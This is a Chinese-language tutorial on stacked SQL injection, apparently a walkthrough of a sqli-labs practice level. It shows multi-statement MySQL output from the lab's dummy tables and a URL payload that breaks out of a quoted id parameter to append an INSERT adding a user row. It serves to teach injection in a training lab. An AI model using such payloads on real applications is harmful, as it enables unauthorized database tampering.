堆叠注入(stacked injections)从名词的含义就可以看到应该是一堆sql语句(多条)一起执行,而在真实的运用中也是这样的,我们知道在mysql 中,主要是命令行中,每一条语句结尾加“;”表示语句结束的,这样我们就想到了是不是可以多句一起使用就叫做堆叠注入
不是每个数据库环境都可以支持堆叠注入
我在mysql数据库中执行如下语句:
select * from users; select * from emails;
结果:
mysql> select * from users; select * from emails;
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | 123456 |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dhakkan | dumbo |
| 14 | admin4 | admin4 |
| 15 | admin'# | admin |
+----+----------+------------+
14 rows in set (0.00 sec)
+----+------------------------+
| id | email_id |
+----+------------------------+
| 1 | Dumb@dhakkan.com |
| 2 | Angel@iloveu.com |
| 3 | Dummy@dhakkan.local |
| 4 | secure@dhakkan.local |
| 5 | stupid@dhakkan.local |
| 6 | superman@dhakkan.local |
| 7 | batman@dhakkan.local |
| 8 | admin@dhakkan.com |
+----+------------------------+
8 rows in set (0.00 sec)
关卡的SQL语句:SELECT * FROM users WHERE id='$id' LIMIT 0,1
使用堆叠注入,添加数据 id为39
Payload:
?id=1 ';insert into users(id,username,password) values ( 39, 'less38 ', 'hello ') --+ bbq
查询id为39查看是否成功:
这篇大佬写的文章比较全面,各个数据库基本上都演示了多语句执行,以及sqli-labs靶场38-45关 https://www.cnblogs.com/backlion/p/9721687.html